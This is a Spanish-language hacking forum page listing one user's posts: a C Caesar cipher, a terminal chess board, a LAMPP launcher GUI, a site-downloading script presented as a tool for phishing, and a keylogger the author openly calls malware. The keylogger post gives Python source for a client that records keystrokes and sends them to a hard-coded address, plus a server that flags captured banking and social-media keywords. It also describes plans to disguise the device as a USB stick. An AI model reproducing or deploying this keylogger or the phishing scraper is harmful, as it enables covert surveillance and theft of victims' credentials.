This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - Zackonit

Pages: [1]
1
C / C++ / Re: Cifrado cesar con C
« on: May 10, 2022, 03:46:58 pm »
You are not allowed to view links. Register or Login
puedes no tener que utilizar una liista de letras haciendo un cast a int y despues casteando de nuevo a char.

Algo asi:

Code: You are not allowed to view links. Register or Login
cifrado[i]=(char)(69+((((int)limpio[i]))-69)+key);

Podrias subir el code de tu solucion para poder examinarla con detenimiento?

2
C / C++ / Cifrado cesar con C
« on: May 10, 2022, 02:32:56 am »
Code: (c) You are not allowed to view links. Register or Login


Buenas tardes sean a todos , pues he estado viendo muchos cifrados en internet pero ninguno me convence o de plano para lo que recien se inician en el lenguaje C es complicado de leer ,asi que les traigo el cifrado cesar usando arrays
y punteros ,pueden mejorar el codigo y ponerlo abajo el objetivo de esto es aprender tecnicas

[color=green]Bueno mucho blablabla ,aqui el code [/color]

#include <stdio.h>

void caesarCipher(int key, char *keyword,int size);

int main(int argc,char const *argv[]){
        char msg[4] = "hola";
        char *keyword = &msg;
        caesarCipher(3,keyword,4);
        return 0;
}

void caesarCipher(int key ,char *keyword,int size){
        char abc[26] = {'a','b','c','d','e',
                        'f','g','h','i','j',
                        'k','l','m','n','o',
                        'p','q','r','s','t',
                        'u','v','w','x','y',
                        'z'};
int buffersize = sizeof(abc)/sizeof(abc[0]);
int z=0;

for(int i=0;i<size;i++){
for(int j=0;j<buffersize;j++){
if(keyword[i] == abc[j]){
   z = j+key;
           printf("%c",abc[z]);    
   if(z > buffersize){
   printf("%c",abc[z-buffersize]);

   }
}
}
}
}



3
Hacking / Tablero de Ajedrez en C [Dev-time]
« on: March 17, 2022, 09:14:43 pm »
Code: (c) You are not allowed to view links. Register or Login

#include <stdio.h>
#include <curses.h>
[color=green]
#define ANSI_COLOR_GREEN   "\x1b[32m"
#define ANSI_COLOR_RESET   "\x1b[0m"[/color]

int generate(int range);
char chess(int row,int col);

int main(int argc,char const *argv[]){
    printf(ANSI_COLOR_GREEN   "\tH4CK3R CH355 v0.01 \n \tby: | @zackonit |"   ANSI_COLOR_RESET "\n");
printf("\n");
printf("\n size : %i bits \n",chess(8,8));
//generate(3);
return 0;
}

char chess(int row,int col){
//podriamos usar numeros pares para rellenar
//los cuadros
//int int_pair(1,COLOR RED, COLOR GREEN);
    int size = row * col;

for(int i=0;i<row;i++){
for(int k=0;k<col;k++){
//pawn
if(i == 1 || i == row-2){
printf(" ♙ ");
}
else if(i == 0 && k == 0 || i == 7 && k == 0
|| i == 0 && k == 7 || i == 7 &&
k == 7){
printf(" ♖ ");
}
else if(i == 0 && k == 1
|| i == 7 && k == 1
|| i == 0 && k == 6
|| i == 7 && k == 6 ){
printf(" ♘ ");
}else if(i == 0 && k== 2
|| i == 0 && k == 5
|| i == 7 && k == 2 ||
i == 7 && k == 5 ){
printf(" ♗ ");
}
else if(i == 0 && k == 4
|| i == 7 && k ==4){
//QUEEN
printf(" ♕ ");
}
else if(i == 0 && k == 3 ||
        i == 7 && k == 3){
printf(" ♔ ");
}
else{
printf( ANSI_COLOR_GREEN   " 0 "   ANSI_COLOR_RESET );
}
}
printf("\n");
}
    return size;
}

4
Hacking / WebScraping ,Descargar un sitio web COMPLETO
« on: August 20, 2021, 03:37:04 am »
El dia de hoy quiero mostrarles como descargar un sitio web completo ,usando tecnicas de WEB SCRAPING

Con esta herramienta puedes descargar un sitio de redes sociales como facebook,twitter etc ,para poder suplantar la identidad con tecnicas de ARP SPOOFING O PHISHING

Espero que sea de su agrado , @zackonit


Code: (python) You are not allowed to view links. Register or Login
import requests

catch = []

def GET_SECT():
    website = input('[GET-HTTPS] ')
    META_HEAD = input('[FILENAME.html] ')
    return website,META_HEAD


class DownloadSites:
    def __init__(self,website):
        self.website = website
        self.EXTENSION = ['.html']
       
    def httpsRequest(self):
        self.request = requests.get(self.website)
        return self.website

    def BuildSite(self,meta_title):
        with open(meta_title+self.EXTENSION[0],'wb') as META_HEAD:
            META_HEAD.write(self.request.text.encode('UTF-8'))
            return "[SUCCESS] +200 <HTTP_REQUEST>"


if __name__ == "__main__":
    statement = GET_SECT()
    catch.append(statement) #save outputs

    ScrappySite = DownloadSites(statement[0])
    print(ScrappySite.httpsRequest())
    print(ScrappySite.BuildSite(statement[1]))


5
Hacking Tools / Encender el servidor LAMPP sin comandos
« on: March 26, 2021, 01:23:12 am »
You are not allowed to view links. Register or Login

Que onda banda , he estado algo ausente estos utlimos meses pero vengo a enseñarles una aplicacion que hice el dia de ayer .Hice una aplicación para
encender el servidor apache en 127.0.0.1 , claramente este script funciona para sistemas Linux

DISFRUTENLO PARA UNDERCODE :3
Code: (python) You are not allowed to view links. Register or Login
import subprocess
from tkinter import *

class Apache_services():
    def __init__(self,window,dimensions='500x500'):
        self.window = Tk()
        self.dimensions = dimensions

    def Apache_root_services(self):
        self.window.title('@Apache service ~zackonit')
        self.window.geometry(self.dimensions)
        self.window.resizable(0,0)
        self.fonty = ("Verdana",24)

        self.INSERT = Label(text="Apache Service 127.0.0.1",
        fg="yellow" ,bg="black",font=self.fonty).pack()

        self.window.configure(background='black')
        '''Recovery buttons'''
        self.service = Label(self.window,text="Open Linux local server",
                             fg='red', bg="black").place(x=25,y=65)

        self.info = Button(self.window,text="Open",bg="green",fg="white",command=self.openLinux_service).place(x=228,y=55)
        self.down = Button(self.window,text="Down" ,bg="red" ,fg="white",command=self.downLinux_service).place(x=328,y=55)

        self.footer =  Label(self.window, text='Development @zackonit',bg="yellow" ,fg="black",width=65, height=3).place(x=1,y=440)

    def openLinux_service(self,unlock='sudo /opt/lampp/lampp start',fail='sudo /etc/init.d/apache2 stop'):
        self.main = subprocess.check_output(fail,subprocess.STDOUT,shell=True)
        self.opt_command = subprocess.check_output(unlock,subprocess.STDOUT,shell=True)
        self.output = Label(text=self.opt_command,fg="blue" ,bg="black",width="50").place(x=15,y=125) 
       
    def downLinux_service(self,down_track='sudo /opt/lampp/lampp stop'):
        self.stoplinux = subprocess.check_output(down_track ,subprocess.STDOUT,shell=True)
        self.out = Label(text=self.stoplinux,fg="violet",bg="black",width="50").place(x=5,y=123)

        self.config = subprocess.check_output('figlet ImHackerEnterMyW0rld',subprocess.STDOUT,shell=True)
        self.ifconfig = Label(text=self.config ,fg="white" ,bg="black").place(x=5,y=210)
       

if __name__ == "__main__":
    apache_services = Apache_services(None)
    apache_services.Apache_root_services()

    apache_services.openLinux_service()
    apache_services.downLinux_service()






6
Hola mi nick es Zackonit y he estado desarrollando un keylogger que detecta palabras clave como facebook,twitter,pornhub ETC. 

Del lado del servidor ,que seria mAT-Trackv1.py es quien recibe los datos del vector1 que funciona cuando el mismo llena con sus tecleos a un 1kb o  puedes modificarlo sea tu caso. Tambien subire como reprogramarlo en una PIC de microcontrolador para que finga ser una memoria usb pero eso es despues xD.

Para poder ejecutarlo seria excitar el Servidor -> python3 mAT-Track.py -v 192.168.x.x -t 8080 -l 2 -f file_system


que seria -v el vector principal o sea tu direccion ip
                -t el puerto con que quieres hacer el tunel de conexion
               -l las conexiones que quieres tener
               -f el nombre del archivo que quieres ver


You are not allowed to view links. Register or Login
 CABE DESTACAR QUE EL MODULO LEDs es mi libreria de colores xD jeje

DESPUES SUBIRE OTRA ACTULIZACION DE ESTE MALWARE PARA QUE SEA MAS COMODO ,EMPLEARE UNA INTERFAZ GRAFICA POR QUE
HASTA AMI ME DUELEN LOS OJOS DE USAR TODO EL DIA LA CONSOLA XD

Code: (python) You are not allowed to view links. Register or Login

import socket,threading
from LEDs import matrix_photons
from time import strftime
import optparse,sys

vectorBreakpoint = ['www.facebook.com','www.twitter.com',
                    'www.reddit.com','www.pornhub.com',
                    'www.santander.com','www.bancomer.com',
                    'www.bbva.com',"face","twi","ban"]

class threadingConnections:
    def intervalSocket(self,ipVector,target,lkive,file_system):
        self.socket_Family=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.file_system=file_system
        self.socket_Family.bind((ipVector,target))
        print(strftime('[%I:%M:%S] ')+'AF_INET: '+ ipVector,'target:',target,'\n',self.socket_Family)
        self.socket_Family.listen(lkive)
       
        self.connections,self.system_Addr=self.socket_Family.accept()
        print(strftime('[%I:%M:%S] ')+"intercept: %s Country: %s range: %s size:kbs(4b)" %(self.system_Addr[0],"Mexico","4"))
        self.info_size=self.connections.recv(2**10).decode("utf-8")
   
    def intoxicateFile_system(self,hexabytes=4096):
        with open(self.file_system,'w') as self.bytes_k:
            self.bytes_k.write(self.info_size)
            self.bytes_k.close()
       
        with open(self.file_system) as x:
            for line in x:
                for fx in vectorBreakpoint:
                    if fx in line:
                        msg=strftime('[%I:%M:%S] ')+"Intercept: %s in %s Country: %s" %(fx,self.system_Addr[0],"México[MEX]")
                        msg=str(msg)
                        matrix_photons.matrix_reaction(True,msg,"w")
                        print(self.socket_Family)
                       
        y=input("[*]Watch Information(Y/N): ")
        if y == 'y'.upper():
            print(self.info_size)
        else:
            self.socket_Family.close()
            sys.exit()
           


args=optparse.OptionParser()

args.add_option("-v","--ip",dest="ipVector",help="Example: 192.168.1.x")
args.add_option("-t","--target",dest="target",type="int",help="Example: target=8080")
args.add_option("-l","--live",dest="lkive",type="int",help="Example: listen(2)")
args.add_option("-f","--filesystem",dest="file_system",help="Example: args(0)")

(options,arguments) = args.parse_args()

ipVector = options.ipVector
target=options.target
lkive=options.lkive
file_system=options.file_system

if __name__ == "__main__":
    threadsSTREAM=threadingConnections()
    if ipVector == None and target == None and lkive == None and file_system==None:
        print("Error: Not parameters in function f(x)")
       
    else:
        threadsSTREAM.intervalSocket(ipVector,target,lkive,file_system)
        threadsSTREAM.intoxicateFile_system()


Code: (python) You are not allowed to view links. Register or Login


import socket,os,sys
from pynput.keyboard import Listener

class keywor0ds_Ward:
     unicodeGlobal = ["UTF-8"]
     
root = "CryptWin.txt"
limit_kilobytes = 1000 # 1kb or 1 kilobyte

Dark_address, tunnel_port = "192.168.1.72",8080


# si el token es 1 entoces se abre la conexion
# el logger se transforma en string
# abre el archvio y escribe sobre el

#se cifra el archivo
#toma captura de la pantalla
#envia el archivo cifrado


class AsignMasterCipherIV:
    def masterCipher_logger(self,logger):
        xyzIV = str(logger)
        xyzIV = xyzIV.replace("'","")
       
        with open(root,"a") as k:
            k.write(xyzIV)

 
        if os.stat(root).st_size >= limit_kilobytes:
            DarkSocket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            DarkSocket.connect((Dark_address,tunnel_port))
           
            with open(root,"r") as rootRead:
                digitalBytes = rootRead.read()
               
            DarkSocket.send(bytes(digitalBytes.encode(keywor0ds_Ward.unicodeGlobal[0])))
            sys.exit()
       
        else:
            pass

if __name__ == "__main__":
    handler_master=AsignMasterCipherIV()
    with Listener(on_press=handler_master.masterCipher_logger(True)) as MultiWriter:
        MultiWriter.join()


Pages: [1]